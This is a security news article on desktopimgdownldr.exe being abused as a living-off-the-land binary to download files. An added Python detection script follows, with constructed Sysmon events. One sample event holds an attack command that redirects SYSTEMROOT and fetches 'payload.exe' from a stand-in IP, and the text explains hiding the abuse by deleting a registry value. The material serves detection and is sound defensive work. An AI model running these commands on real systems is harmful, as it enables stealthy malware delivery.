Attackers often abuse such binaries, known as living-off-the-land binaries (LoLBins), to carry out malicious activity.
With LoLBins, an attacker can download and install malware while evading a device's security controls, such as UAC or WDAC.
Last year Cisco Talos published a list of 13 native Windows executables that intruders can use to download and execute malware.
Security researchers at SentinelOne have now found that desktopimgdownldr.exe, located in the system32 folder of Windows 10, can also serve as a LoLBin.
The executable is part of the Personalization CSP (configuration service provider), which, among other things, allows the lock screen and desktop background images to be set.
For both the desktop background and the lock screen, the tool accepts JPG, JPEG and PNG files stored locally or remotely (it supports HTTP/S URLs).
According to SentinelOne researcher Gal Kristal, running desktopimgdownldr.exe with administrator rights overrides the lock screen image chosen by the user, which would alert the user that something is wrong.
The attacker can avoid this, however, by deleting the registry value immediately after running the binary, so the user notices nothing and the attacker can proceed to execute the malware.
Kristal found that although the executable appears to require elevated rights, since it creates files under C:\Windows and writes to the registry, it can also be run with standard user rights to download files from an external source.
Kristal notes, however, that defenders can address this. He recommends that organisations using Endpoint Detection and Response (EDR) products add desktopimgdownldr.exe to their watchlists so that abuse can be detected and dealt with.
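To make the watchlist advice concrete, here is an added example (not code from SentinelOne or from the article) that triages Sysmon-style process-creation records for desktopimgdownldr.exe abuse. The sample events are constructed. The switch names (/lockscreenurl:, /eventName:), the trick of overriding SYSTEMROOT so the download lands in a user-writable directory, and the heuristic that legitimate CSP-driven use runs as SYSTEM under svchost.exe are assumptions drawn from public LoLBin documentation, not facts stated on this page; tune them to your own telemetry.

```python
"""Triage process-creation telemetry for desktopimgdownldr.exe abuse.

Added example. The switch names, the SYSTEMROOT redirection trick and the
"legitimate use runs as SYSTEM via MDM" heuristic are assumptions taken from
public LoLBin documentation, not from the article this accompanies.
"""
import ntpath
import re
from urllib.parse import urlparse

IMAGE_EXTENSIONS = {".jpg", ".jpeg", ".png"}   # what the tool is meant to fetch
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
URL_ARG = re.compile(r"/(\w*url):(\S+)", re.IGNORECASE)              # e.g. /lockscreenurl:<url>
SYSTEMROOT_ARG = re.compile(r'SYSTEMROOT=("?)([^"&]+)\1', re.IGNORECASE)

# Constructed Sysmon-style (Event ID 1) records; not real telemetry.
SAMPLE_EVENTS = [
    {   # MDM-driven lock-screen change: SYSTEM, hosted by svchost.exe, fetches a PNG
        "Image": r"C:\Windows\System32\desktopimgdownldr.exe",
        "CommandLine": r"desktopimgdownldr.exe /lockscreenurl:https://intranet.example.com/branding/lock.png /eventName:desktopimgdownldr",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "User": r"NT AUTHORITY\SYSTEM", "IntegrityLevel": "System",
    },
    {   # standard user redirecting SYSTEMROOT so the "image" lands in a writable directory
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'cmd /c set "SYSTEMROOT=C:\Users\alice\AppData\Local\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:http://203.0.113.10:8080/payload.exe /eventName:desktopimgdownldr',
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "User": r"CORP\alice", "IntegrityLevel": "Medium",
    },
    {   # admin running it by hand: the extension looks fine, the context does not
        "Image": r"C:\Windows\System32\desktopimgdownldr.exe",
        "CommandLine": r"desktopimgdownldr.exe /lockscreenurl:http://203.0.113.10:8080/update.png /eventName:desktopimgdownldr",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "User": r"CORP\bob", "IntegrityLevel": "High",
    },
    {   # unrelated process, should be ignored
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe notes.txt",
        "ParentImage": r"C:\Windows\explorer.exe",
        "User": r"CORP\alice", "IntegrityLevel": "Medium",
    },
]


def involves_downldr(event):
    """True when the event is desktopimgdownldr.exe itself or a shell launching it."""
    return (ntpath.basename(event.get("Image", "")).lower() == "desktopimgdownldr.exe"
            or "desktopimgdownldr" in event.get("CommandLine", "").lower())


def analyze(event):
    """Return {'suspicious': bool, 'reasons': {code: detail}} for one event."""
    reasons = {}
    if not involves_downldr(event):
        return {"suspicious": False, "reasons": reasons}
    cmd = event.get("CommandLine", "")

    # 1. Any explicit SYSTEMROOT override (assumed trick): the tool writes its download
    #    under %SYSTEMROOT%, so overriding it steers the file into a user-writable path.
    m = SYSTEMROOT_ARG.search(cmd)
    if m:
        reasons["systemroot_override"] = m.group(2).strip()

    # 2. URL argument whose target is not one of the image types the tool is meant to fetch.
    for _, raw in URL_ARG.findall(cmd):
        url = raw.strip('"')
        ext = ntpath.splitext(urlparse(url).path)[1].lower()
        if ext not in IMAGE_EXTENSIONS:
            reasons["non_image_url"] = url

    # 3. Heuristic (assumption): policy-driven use arrives via MDM/CSP under SYSTEM,
    #    so an interactive user context deserves a look even if the URL looks benign.
    if event.get("IntegrityLevel", "").lower() != "system":
        reasons["non_system_context"] = f'{event.get("User")} ({event.get("IntegrityLevel")})'

    # 4. Heuristic (assumption): a scripting shell as parent rather than svchost.exe.
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    if parent in SHELL_PARENTS:
        reasons["shell_parent"] = parent

    return {"suspicious": bool(reasons), "reasons": reasons}


def triage(events):
    """Return (index, result) pairs for every suspicious event in a batch."""
    return [(i, analyze(e)) for i, e in enumerate(events) if analyze(e)["suspicious"]]


if __name__ == "__main__":
    for i, result in triage(SAMPLE_EVENTS):
        print(f"event {i}: {result['reasons']}")
```

The first sample event is left alone on purpose: a bare "desktopimgdownldr.exe ran" alert would fire on every MDM-managed lock-screen rollout, so the rule keys on the combination of a SYSTEMROOT override, a non-image target, and an interactive or shell-launched context instead. Event 2 trips all four checks; event 3 shows why context checks matter when the attacker bothers to give the payload an image extension.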